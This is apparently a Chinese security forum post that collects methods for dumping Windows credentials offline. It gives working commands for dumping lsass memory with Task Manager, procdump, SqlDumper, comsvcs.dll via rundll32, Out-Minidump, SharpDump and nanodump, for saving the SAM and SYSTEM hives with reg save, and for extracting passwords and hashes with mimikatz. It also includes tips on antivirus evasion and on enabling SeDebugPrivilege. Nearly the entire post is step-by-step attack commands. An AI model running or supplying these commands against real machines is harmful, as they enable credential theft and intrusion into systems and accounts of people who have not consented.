前言

本文总结常见的离线解密hash的方式,如有不对之处,还请各位师傅斧正。

任务管理器

以管理员身份打开任务管理器,选中lsass进程,创建转储文件

之后会显示转储文件保存的位置

之后运行mimikatz本地解密

sekurlsa::minidump C:\Users\root\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

Procdump

使用Procdump(管理员权限)进行进程转储,可以下载具有微软签名的procdump,具备一定的免杀能力
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp


之后对导出的凭据进行解密

sqldumper

SQLDumper.exe包含在Microsoft SQL和Office中,可生成完整转储文件
sqldumper的常见路径如下

C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe

C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe

C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe

之后运行

SqlDumper.exe <lsass pid> 0 0x01100

再本地解密即可

comsvcs.dll

使用 rundll32找到机器的comsvcs.dll,之后以powershell(管理员)运行以下命令

Get-Process lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full


之后本地解密

这里测试cmd不能导出文件,后来通过搜索发现在dump指定进程内存文件时,需要开启SeDebugPrivilege权限。而在cmd中此权限是默认禁用的,powershell是默认启用的。

简单解决办法:我们可以在cmd中开启此权限
使用工具https://github.com/daem0nc0re/PrivFu/tree/main/SwitchPriv 来切换权限

注册表导出sam文件

system文件位置:C:\Windows\System32\config\SYSTEM
SAM文件位置:C:\Windows\System32\config\SAM

reg save HKLM\SYSTEM C:\system.hiv 

reg save HKLM\sam C:\sam.hiv


之后对导出的sam文件进行解密

lsadump::sam /sam:C:\sam.hiv /system:C:\system.hiv


这里也可以导出HKLM\security,然后mimikatz离线解密

Out-Minidump

使用powershell脚本:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
运行

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump


之后解密

SharpDump

项目地址:https://github.com/GhostPack/SharpDump
编译好直接运行(管理员权限),然后解密即可

hashdump

项目地址:https://github.com/lengjibo/RedTeamTools/tree/master/windows/hashdump
测试使用new_mimidump成功,须管理员权限

解密

nanodump

项目地址:https://github.com/helpsystems/nanodump
笔者这里是用的老版插件,加载插件后运行nanodump离线dumphash,这里需要管理员权限

在CS中下载

使用shell脚本进行还原

bash restore_signature.sh <dumpfile>


之后解密

结语

上述为常见的离线解密凭证的操作,更多的我们可以使用MiniDumpWriteDump来dump内存
详见ired:https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass#minidumpwritedump-to-memory-using-minidump-callbacks

参考

https://www.anquanke.com/post/id/252552#h2-1
https://loong716.top/posts/lsass/
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass#minidumpwritedump-to-memory-using-minidump-callbacks

点击收藏 | 2 关注 | 3
  • 动动手指,沙发就是你的了!
登录 后跟帖